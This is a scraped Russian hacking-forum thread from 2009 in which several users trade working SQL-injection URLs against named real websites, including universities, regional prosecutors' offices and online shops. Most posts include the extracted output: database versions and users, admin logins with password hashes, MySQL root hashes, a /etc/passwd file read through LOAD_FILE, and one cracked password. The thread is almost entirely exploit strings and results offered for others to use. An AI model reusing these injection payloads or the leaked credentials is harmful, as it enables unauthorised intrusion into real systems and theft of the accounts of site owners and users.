http://arainia.com/software/gizmo/overview.php?nID=-4+union+select+concat(0x3C68313E,user(),0x3a,datab ase(),0x3a,version(),0x3C2F68313E),2,3--user:database:version
xawakeningpath@hugo.futurequest.net:xawakeningpath-awaken:5.0.70-log
http://www.espana.ru/rus/index.php?did=-99999999+union+select+1,2,concat_ws(0x3a,user(),da tabase(),version()),4,5,6,7,8user:database:version
espana@localhost:espana:4.0.27-log
http://www.transylvania-jobs.com/?mn=oferta&id=-13+union+select+1,concat_ws(0x3a,version(),databas e(),user()),3,4,5--
Database Version: 5.0.32-Debian_7etch1~bpo.1-log
Database name: saxas_transylvan
User name: saxas_transylvan@supremecenter52.com
Pagerank: 3
тИЦ: 1300
http://www.poezia.ru/newsline2.php?sid=-1+union+select+concat_ ws(0x3a,version(),database(),user()),2,3,4--
Database Version : 5.0.27
Database name : u32983
User name : u32983@localhost
юзвери:
http://www.poezia.ru/newsline2.php?sid=-1+union+select+concat _ws(0x3a ,uname,pass),2,3,4+from+users+limit+0,1--
mailbrush
01.03.2009, 23:32
http://www.mingei.org/exhibitions/detail.php?EID=-99999999+union+select+1,2,concat(0x223E,user(),0x3 a,database(),0x3a,version(),0x3C212D2D)/*
user():database():version()
mingeior_web@localhost:mingeior_1011:4.1.22-standard
-m0rgan-
01.03.2009, 23:34
Вот небольной сбор багов на конец дня:)
Налетай:)
http://www.v-p-c.fr/article.php?id=-1+union+all+select+0,concat_ws(version(),user(),da tabase()),2,3--
юзер/версия/бд:
vpc@10.0.70.104.0.25-standard-logvpc :
-------------------------------------------------------------
http://www.fpt-soft.com/FR/newsDetail.php?id=-1+union+all+select+0,concat_ws(version(),user(),da tabase()),2,3,4,5,6,7,8--
юзер/версия/бд:
fpt_soft_com@localhost4.1.19-logdb_fpt_soft_com
------------------------------------------------------------
по сути тот же проект, только с другим доменным именем:)
http://www.fsoft.com.vn/FR/newsDetail.php?id=-1+union+all+select+0,concat_ws(version(),user(),da tabase()),2,3,4,5,6,7,8--
юзер/версия/бд:
fpt_soft_com@localhost4.1.19-logdb_fpt_soft_com
-------------------------------------------------------------
http://www.scenarts.fr/fiche_spectacle.php?id=-1+union+all+select+0,1,concat_ws(version(),user(), database()),3,4--
юзер/версия/бд:
logscenarts-scenarts@10.0.75.615.0.68
-------------------------------------------------------------
http://www.rdsm.be/fr/news.php?id=-1+union+all+select+0,concat_ws(version(),user(),da tabase()),2,3--
юзер/версия/бд:
reyskensp@192.168.0.165.0.77-0.dotdeb.0reyskensp
----------------------------------------------------------------
http://www.mielapiculteur.fr/faq2.php?id=-1+union+all+select+0,concat_ws(version(),user(),da tabase()),2,3,4,5,6,7,8,9,10--
юзер/версия/бд:
lunedemiel@localhost4.0.18mielapi
-----------------------------------------------------------------
http://www.sitetic.fr/prod_detail.php?id=-1+union+all+select+0,concat_ws(version(),user(),da tabase()),2,3,4,5,6,7,8,9,10--
юзер/версия/бд:
sitetic-web@localhost4.1.22sitetic
----------------------------------------------------------------
The End!
http://www.ludmilacorlateanu.com/news_details.php?id=-28+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user()),4,5,6,7/*
Database Version: 5.0.32-Debian_7etch1~bpo.1-log
Database name: saxas_lc
User name: saxas_lc@supremecenter52.com
AkyHa_MaTaTa
02.03.2009, 01:14
tv.sinn.ru - ВолгаТелеком
http://tv.sinn.ru/view_all_topic.php?m_id=33955+union+select+1,2,con cat_ws(0x3A,user(),version(),database()),4,5,6,7+--+
tv@localhost
4.0.18-log
tv
Pagerank: 5
тИЦ: 700
http://www.nordicbook.ru/detailed.php?id=-1+union+select+concat_ ws(0x3a,version(),data base(),user()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,1 6,17,18,19,20--&type=Books
Database Version : 4.1.22
Database name : db_nordic_1
User name : dbu_nordic_1@192.168.8.81
--------------------------------------------#
Pagerank: 4
тИЦ: 275
http://gamestation.ru/station.php?dir_id=71&prod_id=12476+union+select+1,2,3, concat _ws(0x3a,version(),database(),user()),5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43, 44,45,46,47,48,49,50,51--
Database Version : 5.0.67
Database name : Gamestation
User name : root@localhost
юзвери:
http://gamestation.ru/station.php?dir_id=71&prod_id=12476+union+select+1,2,3,concat_ ws(0x3a,user_id,email,password),5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45, 46,47,48,49,50,51+from+ps_users--
читаем /etc/passwd :
http://gamestation.ru/station.php?dir_id=71&prod_id=12476+union+select+1,2,3,LOAD_FILE(0x2f657 4632f706173737764),5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 ,34,35,36,37,38,3 9,40,41,42,43, 44,45,46,47,48,49,50,51--
# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06
20:19:56 brooks Exp $ # root:*:0:0:Charlie &:/root:/usr/local/bin/
bash toor:*:0:0:Bourne-again Superuser:/root: daemon:*:1:1:Owner
of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin bin:*:3:7:Binaries
Commands and Source:/:/usr/sbin/nologin tty:*:4:65533:Tty
Sandbox:/:/usr/sbin/nologin kmem:*:5:65533:KMem Sandbox:/:/
usr/sbin/nologin games:*:7:13:Games pseudo-user:/usr/games:/
usr/sbin/nologin news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/
clientmqueue:/usr/sbin/nologin mailnull:*:26:26:Sendmail Default
User:/var/spool/mqueue:/usr/sbin/nologin bind:*:53:53:Bind
Sandbox:/:/usr/sbin/nologin proxy:*:62:62:Packet Filter pseudo-
user:/nonexistent:/usr/sbin/nologin _pflogd:*:64:64:pflogd privsep
user:/var/empty:/usr/sbin/nologin _dhcp:*:65:65:dhcp programs:/
var/empty:/usr/sbin/nologin uucp:*:66:66:UUCP pseudo-user:/var/
spool/uucppublic:/usr/local/libexec/uucp/uucico pop:*:68:6:Post
Office Owner:/nonexistent:/usr/sbin/nologin www:*:80:80:World
Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/
nologin mysql:*:88:88:MySQL Daemon:/nonexistent:/sbin/nologin
dovecot:*:143:143:Dovecot User:/var/empty:/usr/sbin/nologin
volos:*:1000:0::/home/volos:/usr/local/bin/bash
--------------------------------------------#
http://alterego.of.by/library/showarticle.php?id=71+union+select+1,concat_ ws(0x3a,version(),d atabase(),user()),3,4,5,6--
Database Version : 4.0.27-log
Database name : alteregotutby
User name : alteregotutby@gemini.tutby.com
Assembler
02.03.2009, 14:35
http://prosto-kredit.ru
PR: 1
Тиц: 0
Версия: 5.0.45
База данных: prostokreditru
Юзверь: prostokreditru@localhost
http://www.prosto-kredit.ru/next.php?id=1&rid=3%20union%20select%201,2--
Мир Мобил
http://www.mir-mobil.ru/?cat=1518'+and+substring(version(),1,1)=5/*
AkyHa_MaTaTa
02.03.2009, 15:15
www.selec.ru pr-3 ТиЦ - 1100
http://www.selec.ru/?group_id=63+union+select+1,2,concat_ws(0x3A,user( ),user,password,host,file_priv),4,5,6+from+mysql.u ser+--+
Канал «Ночной клуб»
http://www.nclub.tv/index.php?a=129+and+ascii(substring((select+user+f rom+site_userlist+limit+4,1),1,1))%3E1
nclub:ac1735cfce2ccf23db3a17c55259ad10
nclubeditor:63e10def43966f36d767f61d0b92c37c
______________________________________
Канал «Телепутешествия»
http://www.teletravel.tv/index.php?a=205+and+ascii(substring((select+user+f rom+site_userlist+limit+6,1),1,1))%3E1
______________________________________
"РИМ" - интернет-магазин бытовой техники и электроники
http://www.rim-shop.ru/index.php?cat=20'+and+substring(version(),1,1)=5--+
______________________________________
Продажа Недвижимости в Тайланде
http://2-thai.ru/card/?num=55+and+substring(version(),1,1)=5--&sch=2&val=%F0%F3%E1&pg=1
-m0rgan-
02.03.2009, 16:50
Вот сново небольшой сбор скулей от меня :)
На этот раз пройдемся по доменной зоне co.uk!
www.solutionfocusedtrainers.co.uk
PR:2
http://www.solutionfocusedtrainers.co.uk/trainers.php?id=-1+union+all+select+0,concat_ws(version(),user(),da tabase()),2,3,4,5,6--
Юзер/версия/бд:
dbo197803277@212.227.114.1364.0.27-max-logdb197803277
------------------------------------------------------------------
www.mynhw.co.uk
PR:4
http://www.mynhw.co.uk/news-full.php?id=-1+union+all+select+0,1,concat_ws(version(),user(), database()),3,4,5,6,7,8,9--
Юзер/версия/бд:
sniasuper@server213-171-218-159.livedns.org.uk5.0.45SNIA
----------------------------------------------------------------
www.ccsrecruitment.co.uk
PR:1
http://www.ccsrecruitment.co.uk/newsdetail.php?id=-1+union+all+select+0,1,2,3,4,5,6,concat_ws(version (),user(),database()),8,9--
Юзер/версия/бд:
logccsunix_jobs-ccsunix_rishi@web7.myhsphere.cc5.0.67
----------------------------------------------------------------
www.judgement-productions.co.uk
PR:4
http://www.judgement-productions.co.uk/show.php?id=-1+union+all+select+0,1,2,concat_ws(version(),user( ),database())--
Юзер/версия/бд:
judgement1@213.171.218.1375.0.22-logjudgement1
------------------------------------------------------------
www.c8imc.co.uk
PR:1
http://www.c8imc.co.uk/news.php?id=-1+union+all+select+0,1,concat_ws(version(),user(), database()),3,4,5--
Юзер/версия/бд:
mainimc@localhost4.1.19-standard-logmainimc
---------------------------------------------------------
www.positivestepstraining.co.uk
PR:2
http://www.positivestepstraining.co.uk/website.php?id=-1+union+all+select+0,1,2,3,4,5,6,7,8,9,10,concat_w s(version(),user(),database())--
Юзер/версия/бд:
evolvenetroottwo@server213-171-192-98.livedns.org.uk5.0.45evolvenetmainsqltwo
---------------------------------------------------------------------
Вот самый интерестный!!!!11111
www.vogueescorts.co.uk
PR:1
http://www.vogueescorts.co.uk/main.php?id=-255+union+select+1,2,3--
--------------------------------------------------------------------
The End!
Национальная база данных электронной идентификации
http://russiapet.net/index.php?page=-3'+union+select+1,2,version(),4,5,6,7,8,9,0,11,12--+&lang=ru
__________________________________________
Прокуратура Воронежской области - официальный сайт
http://www.prokuratura-vrn.ru/main.php?month=03-2009&getnews=20090302'+and+substring(version(),1,1)=5/*
__________________________________________
Прокуратура Астраханской области - официальный сайт
http://www.astrprok.ru/?month=03-2009&getnews=20090302'+and+substring(version(),1,1)=5--+
S0ulVortex
02.03.2009, 20:40
www.chiminellocatering.com PR=3
http://www.chiminellocatering.com/news.php?ax=v&n=10&id=10&nid=-3+union+select+1,concat_ws(version(),user(),databa se()),3,4,5--
version: 4.1.22-standard-log
user: chiminel_admin@localhost
database: chiminel_cms
--------------------------------------------------------------
www.warrenbaerg.com PR=4
http://www.warrenbaerg.com/news.php?ax=v&n=11&id=11&nid=-3+union+select+1,concat_ws(version(),user(),databa se()),3,4,5--
version: 4.1.22-standard-log
user: warrenba_user@localhost
database: warrenba_cms
Usc.edu
http://viterbi.usc.edu/alumni/classnotes/cn_more_classnotes.php?cat_id=-3'+union+select+1,2,concat_ws(0x3a,versioN()),4,5, 6,7,8,9,10,11,12,13+from+admin/*
http://college.usc.edu/vhi/testimoniesaroundtheworld/location.php?nid=-473+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,version(),34,35,36,37,38/*
Bioen.utah.edu
http://www.bioen.utah.edu/faculty/RDR/index.php?cat_id=-1+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x 7873716C696E6A626567696E,(SELECT+CONCAT(user_id,0x 7873716C696E6A64656C,email,0x7873716C696E6A64656C, pass,0x7873716C696E6A64656C,first_name)+FROM+sbl.u sers+LIMIT+11,1),0x7873716C696E6A656E64),0x71),0x7 1)/*
Siue.edu
http://events.siue.edu/siuevents/article.php?sid=-296+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7 ,8,9,0,1,2,3,4,5,6,7,8,9,0/*
W2.byuh.edu
http://w2.byuh.edu/devotionals/index.php?CatID=-20+union+select+unhex(hex(version()))/*
Stir.sterling.edu
http://stir.sterling.edu/article.php?nid=-391+union+select+1,versioN(),3,4,5,6,7/*
http://www.attasport.eu/ro/index.php?pg=8001&t=-31+union+select+1,concat_ws(0x3a,version(),databas e(),user()),3,4,5,6,7
Database Version: 4.1.22-standard
Database name: attasp_bazis
User name: attasp_zootyo@localhost
http://www.ultrastar.ru/?part=news&newsid=-1+union+select+1,2,3,4,5,6,7,8,9,concat_ ws(0x3a,version(),database(),user()),11,12,13--
Database Version : 5.0.41
Database name : catalog_gsm
User name : webuser@localhos
админ:
http://www.ultrastar.ru/?part=news&newsid=-1+union+select+1,2,3,4,5,6,7,8,9,concat _ws(0x3a,login,passw ord),11,12,13+from+daso_users+limit+0,1--
admin:616f658931beab92a5316727ee9b1ab8
AkyHa_MaTaTa
02.03.2009, 21:32
www.poimai.ru pr-4 ТиЦ - 230
http://www.poimai.ru/catalog/oruzhie/ohotnich_i_nozhi/?id=12195+union+select+1,2,3,concat_ws(0x3A,user,p assword,host,file_priv),5,6,7,8,9,10,11,12,13,14,1 5,16,17+from+mysql.user+--+&target=nw
root@localhost:root:2fbdcd157a5fb159:localhost:Y
http://shintorgservis.ru/index.php?GID=1+union+select+1,2,concat _ws(0x3a,version(),database(),user()),4,5,6,7,8,9, 10,11,12,13,14,15,16--
Database Version : 4.0.27-log
Database name : shintorg
User name : shintorg@zvm18.host.ru
----------------------------------------------------+
http://www.pilotmaster.ru/news.php?item_id=-1+union+select+1,2,version (),4,5,6--
Database Version : 5.0.67
Database name : pilotmaster
User name : pilotmaster@localhost
http://www.oxo.ro/index.php?action=levelbrowser&dir_id=-649+union+select+1,unhex(hex(concat_ws(0x3a,versio n(),database(),user()))),3,4--&SID=
Database Version: 4.1.9-standard
Database name: test1
User name: steph@localhost
http://metalmir.ru/articles/sn.php?id=-53+union+select+1,version(),3,4,5,6,7
тиц: 20
5.0.67-log
http://avtomatpro.info/articles/sn.php?id=-269+union+select+1,version(),3,4,5,6,7
тиц: 40
5.0.67-log
http://masteroff.ru/articles/sn.php?id=-120+union+select+1,version(),3,4,5,6,7
тиц: 40
5.0.67-log
AkyHa_MaTaTa
02.03.2009, 23:26
Klarnet CMS, вроде нигде не нашел этой уязвимости, хотя это трудно назвать какой то упорядоченой CMS, скорей Klarnet framework:
http://www.klarnet.ru/clients/projects/?spheres_id=1+union+select+concat(0x223e3c2f613e2d 2d2d3e,table_name,0x3D3E,COLUMN_NAME,0x3c62723e3c6 13e3c212d2d2d2d),2,3,4+from+INFORMATION_SCHEMA.COL UMNS+where+table_schema+not+in+(0x696e666f726d6174 696f6e5f736368656d61)/*
http://www.lkw-neva.ru/?mode=news&id=-1+union+select+1,2,3,4,concat_ ws(0x3a,versi on(),database(),user()),6,7,8--
Database Version : 4.1.22-log
Database name : wwwlkwnevaru
User name : lkwneva@fe28.hc.ru
-------------------------------------------------------+
http://www.starcom-ru.ru/info.phtml?n_id=-1+union+select+1,2,3,4,concat_ ws(0x3a,version(),database( ),user()),6,7,8,9,10,11--&r_id=26
Database Version : 5.0.67-log
Database name : u35285
User name : u35285@10.10.10.226
админ :
http://www.starcom-ru.ru/info.phtml?n_id=-1+union+select+1,2,3,4,concat_ws(0x3a,login,passwo rd),6,7,8,9,10,11+from+adm _users+limit+0,1--&r_id=26
star:950e35a2244603c495d408e849d3e1cf
http://jfp.ru/articles/sn.php?id=-79+union+select+1,version(),3,4,5,6,7
5.0.67-log
http://www.ictctech.com/category.php?cat=-1003+union+select+1,version(),3,4,5,6,7,8,9,user() ,1,2,3,4,5,6,7,8/*
version():4.1.21
user():www-icavts@localhost
http://www.rimeks.ru/index.php?town=&id=1&page=news&subid=527&year=2009&id_news=-1+union+select+1,2,3,concat _ws(0x3a,version(),database(),user()),5,6,7,8,9,10--
Database Version : 5.0.41-log
Database name : rimex
User name : rimex@troy.mplik.ru
юзвери :
http://www.rimeks.ru/index.php?town=&id=1&page=news&subid=527&year=2009&id_news=-1+union+select+1,2,3,concat_ws(0x3a,login,passwor d),5,6,7,8,9,10+from+login_base+limit+0,1--
админ с форума :
http://www.rimeks.ru/index.php?town=&id=1&page=news&subid=527&year=2009&id_news=-1+union+select+1,2,3,concat_ ws(0x3a,username,user_password),5,6,7,8,9,10+from+ p hpbb_users+limit+1,1--
rimex:e1ab56facf1c794b1eae74b3ad162f13
-------------------------------------------------+
Lada Audio :p
http://www.lada-audio.ru/site/press.php?id=-1+union+select+1,2,3,4,concat _ws(0x3a,version(),database(),user()),6,7,8--
Database Version : 4.1.22-log
Database name : wwwladaaudioru
User name : ladaaudi@localhost
S0ulVortex
03.03.2009, 08:59
www.fresno-restaurants.org
http://www.fresno-restaurants.org/news.php?ax=v&n=7&id=7&nid=-3+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5--
version: 4.1.22-standard-log
user:fresnor2_user@localhost
database:fresnor2_cms
-------------------------------------------------------------
www.roadrageperformance.com
http://www.roadrageperformance.com/news.php?ax=v&n=17&id=7&nid=-3+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5--
version: 4.1.22-standard
user:roadrage_user@localhost
database:roadrage_cms
spherics
03.03.2009, 09:50
На обеде пробежался....
http://www.malagacar.co.uk/carhire/details.php?ID=2798798698768+union+select+1,2,3,4, 5,6,7,8,9,10,11,concat_ws(0x3a,version(),user(),da tabase())--
Version:5.0.45
User:malagaca_malagac@localhost
Database:malagaca_malagacar
http://www.info-please.co.uk/cities.php?id=1678968753377+union+select+1,concat_ ws(0x3a,version(),user(),database()),3,4,5,6,7,8--
Version:5.0.67-community-log
User:nutriadv_mihai@localhost
Database:nutriadv_infoplease
http://www.thelandofgrimney.co.uk/stories.php?ID=68979875528+union+select+1,concat_w s(0x3a,version(),user(),database()),3,4,5,6,7,8,9, 10,11,12,13,14,15,16--
Version:5.0.67
User:gavin@localhost
Database:thelandofgrimney_co_uk_maindb
http://www.techawards.org/laureates/stories/index.php?id=18809570980984+union+select+1,concat_ ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20,21--
Version:5.0.32-Debian_7etch8-log
User:thetech@10.2.1.28
Database:tt_TECH_AWARDS
http://www.oil-city.ru/new_detail.php?id=-1+union+select+concat_ ws(0x3a,version(),database(),user()),2,3--
Database Version : 4.1.22-standard
Database name : wd40ru_oil
User name : wd40ru_oilweb@localhost
-------------------------------------------------------+
http://www.profshina.ru/index.php?page=9005001&tmpl=7&nbid=1&newsid=-1+union+select+concat_ ws(0x3a,version(),database(),user())--
Database Version : 4.1.22
Database name : db_roman056_1
User name : dbu_roman056_2@192.168.9.95
mailbrush
03.03.2009, 17:31
http://www.thaigolfer.com/ranges/rangedetail.phtml?id=-999999+union+select+1,2,3,concat_ws(0x3a,user(),da tabase(),version()),5,6,7,8,9,10,11,12,13,14,15,16 ,17,18/*
user():database():version()
golfer@localhost:golfer:4.0.21-log
Там есть еще табличка user, но колонок подобрать не смог...
Assembler
03.03.2009, 20:44
http://www.turistka.ru/altai/mail.php?firm=-1%20union%20select%20username,user_password,3,4%20 from%20bb_users%20limit%201,1--
SAN
d32f227fabf9c471fcceb0f12d8a626d (Нужно расшифровать с меня +_)
pr 4
http://www.tot.biz.ua/ru/news/?cid=32&nid=-1+union+select+1,2,3,4,5,concat _ws(0x3a,version(),database(),user()),7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23--
Database Version : 5.0.75
Database name : totbiz
User name : totbizua@localhost
юзверь:
http://www.tot.biz.ua/ru/news/?cid=32&nid=-1+union+select+1,2,3,4,5,concat _ws(0x3a,login,pass),7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23+from+va cuums_users+limit+0,1--
marina:f1ac4a2e174b0a964a821f3826c35be3
----------------------------------------------------------+
Масло Hado :p
http://www.hado.ru/index.php?we=novosti&wt=-1+union+select+1,concat_ ws(0x3a,version(),database(),user()),3--
Database Version : 4.1.22-log
Database name : www1vclggru_hado
User name : z1vc01_hado@fe65.hc.ru
-m0rgan-
03.03.2009, 21:37
Вот сеово небольшой сбор скулей by me :)
Налетай как говорица :)
http://www.deluthiers.com/es/category.php?id=-1+union+all+select+0,1,concat_ws(0x3a,version(),us er(),database()),3,4,5--
юзер/версия/бд:
4.1.22-standard:luthier_luthier@localhost:luthier_deluthi ers
-----------------------------------------------------------------
http://www.educationsante.be/es/article.php?id=-1+union+all+select+0,1,2,3,4,5,concat_ws(0x3a,vers ion(),user(),database()),7--
юзер/версия/бд:
5.0.44-log:educatio@localhost:educatio
---------------------------------------------------------------
http://www.mammaparliamodidoping.it/post.php?ID=-1+union+all+select+0,1,concat_ws(0x3a,version(),us er(),database()),3--
юзер/версия/бд:
4.0.25-log:mpdd@localhost:devmpdd
-----------------------------------------------------------------
http://www.marmaglia.it/post.php?id=-1+union+all+select+0,concat_ws(0x3a,version(),user (),database()),2,3,4,5,6,7--
юзер/версия/бд:
4.1.22-standard:marmagli_user@localhost:marmagli_marmagli a
-------------------------------------------------------------------
http://www.univs.cn/univs/xidian/it/read.php?id=-1+union+all+select+0,concat_ws(0x3a,version(),user (),database()),2,3,4,5--
юзер/версия/бд:
4.0.26-log:xidian@localhost:ucnews
-------------------------------------------------------------------
http://www.maipiudivisi.it/read.php?id=-1+union+all+select+0,1,concat_ws(0x3a,version(),us er(),database()),3,4--
юзер/версия/бд:
4.0.11a-gamma:maui@151.1.152.166:maipiudivisi
----------------------------------------------------------------
http://www.laboratorioclinicopedagogico.it/curriculum.php?id=-1+union+all+select+0,1,2,concat_ws(0x3a,version(), user(),database()),4,5--
юзер/версия/бд:
4.0.22-debug:illaboratorio@localhost:laboratorio
-------------------------------------------------------------------
http://esterproductions.it/curriculum.php?ID=-1+union+all+select+0,1,2,concat_ws(0x3a,version(), user(),database())--
юзер/версия/бд:
5.0.51a-3ubuntu5.4:ester@localhost:esterproductions_db1
----------------------------------------------------------------------
http://www.sptcomo.it/newsDetail.php?id=-1+union+all+select+0,concat_ws(0x3a,version(),user (),database()),2,3,4,5,6,7,8,9--
юзер/версия/бд:
4.1.22-standard:sptcoit_go38ty71@localhost:sptcoit_sf33tR 3
----------------------------------------------------------------------
http://www.comune.poirino.to.it/readnews.php?id=-1+union+all+select+0,1,2,convert(concat_ws(0x3a,ve rsion(),user(),database())+using+latin1),4,5--
юзер/версия/бд:
4.1.16-standard-log:Nick1@66.71.190.34:031492Nick
--------------------------------------------------------------------
The End!
erihtoney
03.03.2009, 22:11
http://www.constant.ru/index.php?itemMenu=curorts&idcountry=5+union+select+1,2,version(),4,5,6,7,8,9 ,10,11,12,13,14+--
http://www.constant.ru/index.php?itemMenu=curorts&idcountry=5+union+select+1,2,user(),4,5,6,7,8,9,10 ,11,12,13,14+--
http://www.constant.ru/index.php?itemMenu=curorts&idcountry=5+union+select+1,2,database(),4,5,6,7,8, 9,10,11,12,13,14+--
version : 4.0.26-log
user : constant@localhost
database : constant_ru
______________________________
http://www.metalportal.com.ua/gost.php?action=open&id=-3+union+select+1,version()
http://www.metalportal.com.ua/gost.php?action=open&id=-3+union+select+1,user()
http://www.metalportal.com.ua/gost.php?action=open&id=-3+union+select+1,database()
version : 4.1.22-standard 1
user : metalpor_metalpo@localhost 1
database : metalpor_clients 1
PS: Вывод осуществляется в загаловке страницы
______________________________
Российская национальная горнолыжная школа
http://ski.stel.ru/rus/forage.shtml?id=1+union+select+1,2,concat_ws(0x202 03a3a2020,user(),version(),database()),4,5,6,7,8,9 ,0,1,2,3,4,5,6,7,8
user: arasia@localhost
version: 4.1.22
database: skivagi
______________________________
http://www.maer-sport.ru/news/index.php?id=-12+union+select+1,2,concat_ws(0x20203a3a2020,user( ),version(),database()),4,5/*
user: maerspo1_sport@localhost
version: 4.1.22-log
database: maerspo1_maer
______________________________
http://www.srg.com.bs/news.php?id=-5+union+select+1,2,3,4,concat_ws(0x20203a3a2020,us er(),version(),database()),6,7,8,9,10,11,12,13&type=news&cmd=display
user: indigo_admin@localhost
version: 4.0.23-debug
database: indigonetworks
Собственно пассы:
http://www.srg.com.bs/news.php?id=-5+union+select+1,2,3,4,user,password,7,8,9,10,11,1 2,13+from+mysql.user--&type=news&cmd=display
root 457265956b0a4b08
root 67e919553dd7e948
indigo_admin 1f5f0cb349d22d64
S0ulVortex
03.03.2009, 22:55
www.drgas.net PR=3
https://www.drgas.net/catalog.php?catid=3+UNION+SELECT+1,2,3,concat_ws(0 x3a,version(),user(),database()),5,6--
version: 4.1.22-max-log
user: drgas_maindb@64.202.163.140
database: drgas_maindb
--------------------------------------------------------------
www.terainvest.com PR=2
http://www.terainvest.com/catalog.php?catid=4+UNION+SELECT+1,2,3,concat_ws(0 x3a,version(),user(),database()),5,6,7,8,9,10--
version: 4.0.27-log
user: u2462@localhost
database: u2462
http://lemonburst.biz/display.php?id=206/**/UNION/**/SELECT/**/1,02,3,4,5,6,7,8,9,10,11,12,13,14/*
Database Version: 4.1.22
Database name: stewsk867
User name: stewsk867@10.6.0.10
2 Assembler
d32f227fabf9c471fcceb0f12d8a626d:sss113
http://yoky-lib.com/vb.php?id=-1+union+select+1,2,3,4,5,6,7,8,column_name,10+from +information_schema.columns+where+table_name=0xa5e 3eba5/*
там чета про пшп, вб етк..
5 версия..
http://www.autohof.ru/news.php?id=28+union+select+1,concat_ ws(0x3a,version(),database(),user()),3,4--
Database Version : 4.1.20-lk-log
Database name : authru
User name : authru@localhost
а дальше не дает SpaceWeb ((( insecure
Calcutta
04.03.2009, 08:34
http://pornkisk.ru/film.php?id=479+union+select+1,2,3,4,version(),6--
5.0.51a-community
http://slipfall.biz/band-member-display.php?id=11+union+select+1,password,username ,4,5,6+from+admin/*
Database Version: 4.0.27-max-log
Database name: slipfall
User name: slipfall@208.109.78.170
хз где админка (((((((
http://www.porsche-spb.ru/model.phtml?id=-11+UNION+SELECT+1,2,3,CONCAT(Version(),Database(), User()),5,6,7--
Database Version: 5.0.77
Database name: porsche_main
User name: porsche_main@localhost
admin:6ac8f89a724b853d
Calcutta
04.03.2009, 13:27
http://solidarnist.com.ua/index.php?mode=news_full&news_id=-1+union+select+1,2,3,4--
4.1.22-log
http://www.easysexporn.com/view.php?id=-1%20UNION%20SELECT%201,concat_ws(0x3a,version(),da tabase(),user()),3,4,5,6,7,8,9--
4.1.22-standard:xxxhome_easysexporn:xxxhome_easysex@local host
:D
http://www.sexyshop.com.ve/articulos.php?id=-1%20UNION%20SELECT%201,concat_ws(0x3a,version(),da tabase(),user()),3,4--
5.0.67-COMMUNITY-LOG:ECLECTIC_SHOPSE:ECLECTIC_SHOP1@LOCALHOST
spherics
04.03.2009, 16:15
Магазин Порнухи!
http://www.pornfilmshop.com/product_info.php?products_id=3807/**/union/**/select/**/concat_ws(0x3a,version(),user(),database()),2/*
Version: 4.1.21
User:dvdlist@localhost
Database:dvdlist_db1
http://www.pornfilmshop.com/product_info.php?products_id=3807/**/union/**/select/**/1,2/**/from/**/admin/*
Не перебирал....
I love this game
04.03.2009, 16:52
_http://ictnieuws.educos.nl/detail.php?ID=-1+union+all+select+0,1,concat_ws(version(),user(), database()),3--
educos@www03.ip2.net5.0.51educos
------
_http://www.nvha.nl/readnews.php?id=-1+union+all+select+0,1,concat_ws(version(),user(), database()),3,4--
053nvha@10.0.1.615.0.51a-3ubuntu5.15053nvha
------
_http://www.trovet.nl/newsdetail.php?id=-1+union+all+select+0,1,2,3,4,concat_ws(version(),u ser(),database()),6,7--
trovet_user@localhost5.0.27trovet_data
-----
_http://www.zeelandwoning.nl/pages.php?id=-1+union+all+select+0,concat_ws(version(),user(),da tabase()),2--
zeelandwon_joom@localhost5.0.51a-community-logzeelandwon_joom
-----
_http://www.spsrasd.info/fr/detail.php?id=-1+union+all+select+0,concat_ws(version(),user(),da tabase()),2,3,4,5,6,7--
spsrasd@localhost5.0.58cms
-----
_http://www.cmgolf.fr/product.php?id=-1+union+all+select+0,1,2,concat_ws(version(),user( ),database()),4,5,6,7,8,9--
my67521@62.193.203.2265.0.32-Debian_7etch6-logmy67521
http://www.paik.ru/?menu=view&sid=-1+union+select+concat_ ws(0x3a,version(),database(),user()),2--
Database Version : 4.1.22-log
Database name : wwwpaikru
User name : paik@localhost
----------------------------------------------+
http://www.sp-vms.com/index.php?id=1+union+select+1,aes_decrypt(aes_encr ypt(concat_ws(0x3a,ve rsion() ,database(),user()),0x71),0x71),3,4,5,6,7--
Database Version : 4.1.14-max-log
Database name : sp_vms
User name : vms@localhost.localdomain
AkyHa_MaTaTa
04.03.2009, 20:00
www.edutech.ch pr-7
http://www.edutech.ch/lms/ev3/showreport.php?prodid=-121+union+select+1,2,3,4,5,6,concat_ws(0x3A,user() ,version(),database()),8,9,10,11,12,13,14--+
user : nte_edutech@localhost
version : 5.0.32-Debian_7etch8-log
database : nte_edutech
S0ulVortex
04.03.2009, 20:13
www.advancedbariatriccenter.net
http://www.advancedbariatriccenter.net/news.php?ax=v&n=9&id=9&nid=-3+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5--
version: 4.1.22-standard-log
user: advanced_admin@localhost
database: advanced_cms
http://www.maxauto.ru/index.php?razdel=5&news=-1+union+select+1,concat_ws(0x3a,version( ),databas e(),user()),3,4,5--&page=1
Database Version : 5.0.24a-community-nt
Database name : news
User name : automax@localhost
---------------------------------------------------+
